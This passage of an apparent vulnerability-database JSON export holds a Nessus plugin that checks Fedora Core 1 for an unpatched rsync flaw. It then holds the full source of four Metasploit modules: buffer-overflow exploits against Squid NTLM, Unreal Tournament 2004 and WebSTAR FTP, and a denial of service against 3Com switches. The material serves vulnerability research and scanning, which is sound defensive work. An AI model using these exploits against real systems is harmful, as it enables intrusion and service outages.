audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"rsync-2.5.7-5.fc1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"rsync-debuginfo-2.5.7-5.fc1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync / rsync-debuginfo\");\n}\n", "title": "Fedora Core 1 : rsync-2.5.7-5.fc1.1 (2004-268)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 3, "lastseen": "2018-08-02T07:39:51"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:fedoraproject:fedora:rsync-debuginfo", "cpe:/o:fedoraproject:fedora_core:1", "p-cpe:/a:fedoraproject:fedora:rsync"], "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update backports a security fix to a path-sanitizing flaw that\naffects rsync when it is used in daemon mode without also using\nchroot. For more information see\nhttp://samba.org/rsync/#security_aug04\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 6, "enchantments": {"dependencies": {"modified": "2019-10-28T20:10:53", "references": [{"idList": ["MSF:EXPLOIT/LINUX/GAMES/UT2004_SECURE", "MSF:EXPLOIT/LINUX/PROXY/SQUID_NTLM_AUTHENTICATE", "MSF:EXPLOIT/OSX/FTP/WEBSTAR_FTP_USER"], "type": "metasploit"}]}, "score": {"modified": "2019-10-28T20:10:53", "value": -0.1, "vector": "NONE"}}, "hash": "84f48f0442bd9d24a6e0e9154344ed174e60190a53aa22e230f489cf64849208", "hashmap": [{"hash": "b3a7974d9eff30d91644ca0b54b4698a", "key": "reporter"}, {"hash": "1fb9a956dabb656e30de77a1a3f76578", "key": "references"}, {"hash": "33edf41c0becd0d57c35c4e27276617b", "key": "pluginID"}, {"hash": "7578d5ce1ecd89e889f945f8cea4d405", "key": "sourceData"}, {"hash": "dd3f893edcdb788d95f2e07a4624d018", "key": "href"}, {"hash": "ed1583cd32f2c215efa9a303dcb371fe", "key": "description"}, {"hash": "9e0167a9a2bba7a60263f4638bf6bc04", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d7108e7210c9d54f2da425d97c39c85b", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "8d049d70b5c8343b4bfd590d8fa17828", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/14320", "id": "FEDORA_2004-268.NASL", "lastseen": "2019-10-28T20:10:53", "modified": "2019-10-02T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "14320", "published": "2004-08-20T00:00:00", "references": ["http://www.nessus.org/u?7aba8938", "http://samba.org/rsync/#security_aug04"], "reporter": "This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-268.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14320);\n script_version (\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:32:23\");\n\n script_xref(name:\"FEDORA\", value:\"2004-268\");\n\n script_name(english:\"Fedora Core 1 : rsync-2.5.7-5.fc1.1 (2004-268)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update backports a security fix to a path-sanitizing flaw that\naffects rsync when it is used in daemon mode without also using\nchroot. For more information see\nhttp://samba.org/rsync/#security_aug04\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://samba.org/rsync/#security_aug04\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-August/000265.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7aba8938\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rsync and / or rsync-debuginfo packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rsync-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"rsync-2.5.7-5.fc1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"rsync-debuginfo-2.5.7-5.fc1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync / rsync-debuginfo\");\n}\n", "title": "Fedora Core 1 : rsync-2.5.7-5.fc1.1 (2004-268)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified"], "edition": 6, "lastseen": "2019-10-28T20:10:53"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "9e0167a9a2bba7a60263f4638bf6bc04"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "ed1583cd32f2c215efa9a303dcb371fe"}, {"key": "href", "hash": "dd3f893edcdb788d95f2e07a4624d018"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "33edf41c0becd0d57c35c4e27276617b"}, {"key": "published", "hash": "8d049d70b5c8343b4bfd590d8fa17828"}, {"key": "references", "hash": "1fb9a956dabb656e30de77a1a3f76578"}, {"key": "reporter", "hash": "b3a7974d9eff30d91644ca0b54b4698a"}, {"key": "sourceData", "hash": "7578d5ce1ecd89e889f945f8cea4d405"}, {"key": "title", "hash": "d7108e7210c9d54f2da425d97c39c85b"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "ef1e5713c61f77686365f4438dc4ba003107e42ddbd78668948f985ac35117a6", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/PROXY/SQUID_NTLM_AUTHENTICATE", "MSF:EXPLOIT/LINUX/GAMES/UT2004_SECURE", "MSF:EXPLOIT/OSX/FTP/WEBSTAR_FTP_USER"]}], "modified": "2019-11-01T02:26:28"}, "score": {"value": -0.1, "vector": "NONE", "modified": "2019-11-01T02:26:28"}, "vulnersScore": -0.1}, "objectVersion": "1.3", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-268.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14320);\n script_version (\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:32:23\");\n\n script_xref(name:\"FEDORA\", value:\"2004-268\");\n\n script_name(english:\"Fedora Core 1 : rsync-2.5.7-5.fc1.1 (2004-268)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update backports a security fix to a path-sanitizing flaw that\naffects rsync when it is used in daemon mode without also using\nchroot. For more information see\nhttp://samba.org/rsync/#security_aug04\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://samba.org/rsync/#security_aug04\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-August/000265.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7aba8938\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rsync and / or rsync-debuginfo packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rsync-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"rsync-2.5.7-5.fc1.1\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"rsync-debuginfo-2.5.7-5.fc1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync / rsync-debuginfo\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "14320", "cpe": ["p-cpe:/a:fedoraproject:fedora:rsync-debuginfo", "cpe:/o:fedoraproject:fedora_core:1", "p-cpe:/a:fedoraproject:fedora:rsync"], "scheme": null}
{"metasploit": [{"lastseen": "2019-11-24T11:30:33", "bulletinFamily": "exploit", "description": "This module causes a temporary denial of service condition against 3Com SuperStack switches. By sending excessive data to the HTTP Management interface, the switch stops responding temporarily. The device does not reset. Tested successfully against a 3300SM firmware v2.66. Reported to affect versions prior to v2.72.\n", "modified": "2017-11-08T16:00:24", "published": "2009-07-01T03:57:04", "id": "MSF:AUXILIARY/DOS/HTTP/3COM_SUPERSTACK_SWITCH", "href": "", "type": "metasploit", "title": "3Com SuperStack Switch Denial of Service", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => '3Com SuperStack Switch Denial of Service',\n 'Description' => %q{\n This module causes a temporary denial of service condition\n against 3Com SuperStack switches. By sending excessive data\n to the HTTP Management interface, the switch stops responding\n temporarily. The device does not reset. Tested successfully\n against a 3300SM firmware v2.66. Reported to affect versions\n prior to v2.72.\n },\n 'Author' => [ 'aushack' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n # aushack - I am not sure if these are correct, but the closest match!\n [ 'OSVDB', '7246' ],\n [ 'CVE', '2004-2691' ],\n [ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],\n ],\n 'DisclosureDate' => 'Jun 24 2004'))\n\n register_options( [ Opt::RPORT(80) ])\n end\n\n def run\n begin\n connect\n print_status(\"Sending DoS packet to #{rhost}:#{rport}\")\n\n sploit = \"GET / HTTP/1.0\\r\\n\"\n sploit << \"Referer: \" + Rex::Text.rand_text_alpha(1) * 128000\n\n sock.put(sploit +\"\\r\\n\\r\\n\")\n disconnect\n print_error(\"DoS packet unsuccessful\")\n rescue ::Rex::ConnectionRefused\n print_error(\"Unable to connect to #{rhost}:#{rport}\")\n rescue ::Errno::ECONNRESET\n print_good(\"DoS packet successful. #{rhost} not responding.\")\n end\n\n end\nend\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/3com_superstack_switch.rb"}, {"lastseen": "2019-10-12T22:10:30", "bulletinFamily": "exploit", "description": "This is an exploit for Squid\\'s NTLM authenticate overflow (libntlmssp.c). Due to improper bounds checking in ntlm_check_auth, it is possible to overflow the 'pass' variable on the stack with user controlled data of a user defined length. Props to iDEFENSE for the advisory.\n", "modified": "2017-07-24T13:26:21", "published": "2006-12-14T00:23:56", "id": "MSF:EXPLOIT/LINUX/PROXY/SQUID_NTLM_AUTHENTICATE", "href": "", "type": "metasploit", "title": "Squid NTLM Authenticate Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Brute\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Squid NTLM Authenticate Overflow',\n 'Description' => %q{\n This is an exploit for Squid\\'s NTLM authenticate overflow\n (libntlmssp.c). Due to improper bounds checking in\n ntlm_check_auth, it is possible to overflow the 'pass'\n variable on the stack with user controlled data of a user\n defined length. Props to iDEFENSE for the advisory.\n },\n 'Author' => 'skape',\n 'References' =>\n [\n [ 'CVE', '2004-0541'],\n [ 'OSVDB', '6791'],\n [ 'URL', 'http://www.idefense.com/application/poi/display?id=107'],\n [ 'BID', '10500'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 256,\n 'MinNops' => 16,\n 'Prepend' => \"\\x31\\xc9\\xf7\\xe1\\x8d\\x58\\x0e\\xb0\\x30\\x41\\xcd\\x80\",\n 'PrependEncoder' => \"\\x83\\xec\\x7f\",\n\n },\n 'Platform' => %w{ linux },\n 'Targets' =>\n [\n [ 'Linux Bruteforce',\n {\n 'Platform' => 'linux',\n 'Bruteforce' =>\n {\n 'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c },\n 'Stop' => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc },\n 'Step' => 0\n }\n },\n ],\n ],\n 'DisclosureDate' => 'Jun 8 2004',\n 'DefaultTarget' => 0))\n\n register_advanced_options(\n [\n # We must wait 15 seconds between each attempt so as to prevent\n # squid from exiting completely after 5 crashes.\n OptInt.new('BruteWait', [ false, \"Delay between brute force attempts\", 15 ]),\n ])\n end\n\n def brute_exploit(addresses)\n site = \"http://\" + rand_text_alpha(rand(128)) + \".com\"\n\n print_status(\"Trying 0x#{\"%.8x\" % addresses['Ret']}...\")\n connect\n\n trasnmit_negotiate(site)\n transmit_authenticate(site, addresses)\n\n handler\n disconnect\n end\n\n def trasnmit_negotiate(site)\n negotiate =\n \"NTLMSSP\\x00\" + # NTLMSSP identifier\n \"\\x01\\x00\\x00\\x00\" + # NTLMSSP_NEGOTIATE\n \"\\x07\\x00\\xb2\\x07\" + # flags\n \"\\x01\\x00\\x09\\x00\" + # workgroup len/max (1)\n \"\\x01\\x00\\x00\\x00\" + # workgroup offset (1)\n \"\\x01\\x00\\x03\\x00\" + # workstation len/max (1)\n \"\\x01\\x00\\x00\\x00\" # workstation offset (1)\n\n print_status(\"Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)\")\n req =\n \"GET #{site} HTTP/1.1\\r\\n\" +\n \"Proxy-Connection: Keep-Alive\\r\\n\" +\n \"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\\r\\n\" +\n \"\\r\\n\"\n sock.put(req)\n\n end\n\n def transmit_authenticate(site, addresses)\n overflow =\n rand_text_alphanumeric(0x20) +\n [addresses['Ret']].pack('V') +\n [addresses['Valid']].pack('V') +\n \"\\xff\\x00\\x00\\x00\"\n shellcode = payload.encoded\n pass_len = [overflow.length + shellcode.length].pack('v')\n authenticate =\n \"NTLMSSP\\x00\" + # NTLMSSP identifier\n \"\\x03\\x00\\x00\\x00\" + # NTLMSSP_AUTHENTICATE\n pass_len + pass_len + # lanman response len/max\n \"\\x38\\x00\\x00\\x00\" + # lanman response offset (56)\n \"\\x01\\x00\\x01\\x00\" + # nt response len/max (1)\n \"\\x01\\x00\\x00\\x00\" + # nt response offset (1)\n \"\\x01\\x00\\x01\\x00\" + # domain name len/max (1)\n \"\\x01\\x00\\x00\\x00\" + # domain name offset (1)\n \"\\x01\\x00\\x01\\x00\" + # user name (1)\n \"\\x01\\x00\\x00\\x00\" + # user name offset (1)\n \"\\x00\\x00\\x00\\x00\" + # session key\n \"\\x8b\\x00\\x00\\x00\" + # session key\n \"\\x06\\x82\\x00\\x02\" + # flags\n overflow + shellcode\n\n print_status(\"Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)\")\n req =\n \"GET #{site} HTTP/1.1\\r\\n\" +\n \"Proxy-Connection: Keep-Alive\\r\\n\" +\n \"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(authenticate)}\\r\\n\" +\n \"\\r\\n\"\n sock.put(req)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/proxy/squid_ntlm_authenticate.rb"}, {"lastseen": "2019-11-22T20:45:19", "bulletinFamily": "exploit", "description": "This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times.\n", "modified": "2017-07-24T13:26:21", "published": "2005-12-26T14:34:22", "id": "MSF:EXPLOIT/LINUX/GAMES/UT2004_SECURE", "href": "", "type": "metasploit", "title": "Unreal Tournament 2004 \"secure\" Overflow (Linux)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Udp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Unreal Tournament 2004 \"secure\" Overflow (Linux)',\n 'Description' => %q{\n This is an exploit for the GameSpy secure query in\n the Unreal Engine.\n\n This exploit only requires one UDP packet, which can\n be both spoofed and sent to a broadcast address.\n Usually, the GameSpy query server listens on port 7787,\n but you can manually specify the port as well.\n\n The RunServer.sh script will automatically restart the\n server upon a crash, giving us the ability to\n bruteforce the service and exploit it multiple\n times.\n },\n 'Author' => [ 'onetwo' ],\n 'License' => BSD_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2004-0608'],\n [ 'OSVDB', '7217'],\n [ 'BID', '10570'],\n\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 512,\n 'BadChars' => \"\\x5c\\x00\",\n\n },\n 'Platform' => 'linux',\n 'Targets' =>\n [\n ['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer\n ['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],\n ],\n 'DisclosureDate' => 'Jun 18 2004'))\n\n register_options(\n [\n Opt::RPORT(7787)\n ])\n end\n\n def exploit\n connect_udp\n\n buf = make_nops(1024)\n buf[24, 4] = [target['Rets'][1]].pack('V')\n buf[44, 4] = [target['Rets'][0]].pack('V')\n buf[56, 4] = [target['Rets'][1]].pack('V')\n buf[48, 6] = \"\\x8d\\x64\\x24\\x0c\\xff\\xe4\" #LEA/JMP\n\n buf[0, 8] = \"\\\\secure\\\\\"\n buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded\n\n udp_sock.put(buf)\n\n handler\n disconnect_udp\n end\n\n def ut_version\n connect_udp\n udp_sock.put(\"\\\\basic\\\\\")\n res = udp_sock.recvfrom(8192)\n disconnect_udp\n\n if (res and (m=res.match(/\\\\gamever\\\\([0-9]{1,5})/)))\n return m[1]\n end\n\n return\n end\n\n def check\n vers = ut_version\n\n if (not vers)\n vprint_status(\"Could not detect Unreal Tournament Server\")\n return Exploit::CheckCode::Unknown\n end\n\n print_status(\"Detected Unreal Tournament Server Version: #{vers}\")\n if (vers =~ /^(3120|3186|3204)$/)\n vprint_status(\"This system appears to be exploitable\")\n return Exploit::CheckCode::Appears\n end\n\n\n if (vers =~ /^(2...)$/)\n vprint_status(\"This system appears to be running UT2003\")\n return Exploit::CheckCode::Detected\n end\n\n vprint_status(\"This system appears to be patched\")\n return Exploit::CheckCode::Safe\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/games/ut2004_secure.rb"}, {"lastseen": "2019-11-26T21:37:28", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in the logging routine of the WebSTAR FTP server. Reliable code execution is obtained by a series of hops through the System library.\n", "modified": "2017-07-24T13:26:21", "published": "2005-11-25T20:31:34", "id": "MSF:EXPLOIT/OSX/FTP/WEBSTAR_FTP_USER", "href": "", "type": "metasploit", "title": "WebSTAR FTP Server USER Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Ftp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WebSTAR FTP Server USER Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the logging routine\n of the WebSTAR FTP server. Reliable code execution is\n obtained by a series of hops through the System library.\n },\n 'Author' => [ 'ddz', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2004-0695'],\n [ 'OSVDB', '7794'],\n [ 'BID', '10720'],\n\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 300,\n 'BadChars' => \"\\x00\\x20\\x0a\\x0d\",\n 'Compat' =>\n {\n 'ConnectionType' => \"+find\"\n },\n },\n 'Platform' => %w{ osx },\n 'Targets' =>\n [\n [\n 'Mac OS X 10.3.4-10.3.6',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_PPC,\n 'Rets' => [ 0x9008dce0, 0x90034d60, 0x900ca6d8, 0x90023590 ],\n },\n ],\n ],\n 'DisclosureDate' => 'Jul 13 2004',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('MHOST', [ false, \"Our IP address or hostname as the target resolves it\" ]),\n ], self)\n end\n\n # crazy dino 5-hop foo\n #$ret = pack('N', 0x9008dce0); # call $r28, jump r1+120\n #$r28 = pack('N', 0x90034d60); # getgid()\n #$ptr = pack('N', 0x900ca6d8); # r3 = r1 + 64, call $r30\n #$r30 = pack('N', 0x90023590); # call $r3\n\n def exploit\n connect\n\n # The offset to the return address is dependent on the length of our hostname\n # as the target system resolves it ( IP or reverse DNS ).\n mhost = datastore['MHOST'] || Rex::Socket.source_address(datastore['RHOST'])\n basel = 285 - mhost.length\n\n print_status(\"Trying target #{target.name}...\")\n\n # ret = 296\n # r25 = 260\n # r26 = 264\n # r27 = 268\n # r28 = 272\n # r29 = 276\n # r30 = 280\n # r31 = 284\n\n # r1+120 = 408\n\n buf = rand_text_alphanumeric(basel + 136 + 56, payload_badchars)\n buf[basel + 24, 4] = [ target['Rets'][0] ].pack('N') # call $r28, jump r1+120\n buf[basel , 4] = [ target['Rets'][1] ].pack('N') # getgid()\n buf[basel + 136, 4] = [ target['Rets'][2] ].pack('N') # (r1+120) => r3 = r1 + 64, call $r30\n buf[basel + 120, 4] = [ target['Rets'][3] ].pack('N') # call $r3\n buf << payload.encoded\n\n send_cmd( ['USER', buf] , true )\n send_cmd( ['HELP'] , true )\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/ftp/webstar_ftp_user.rb"}]}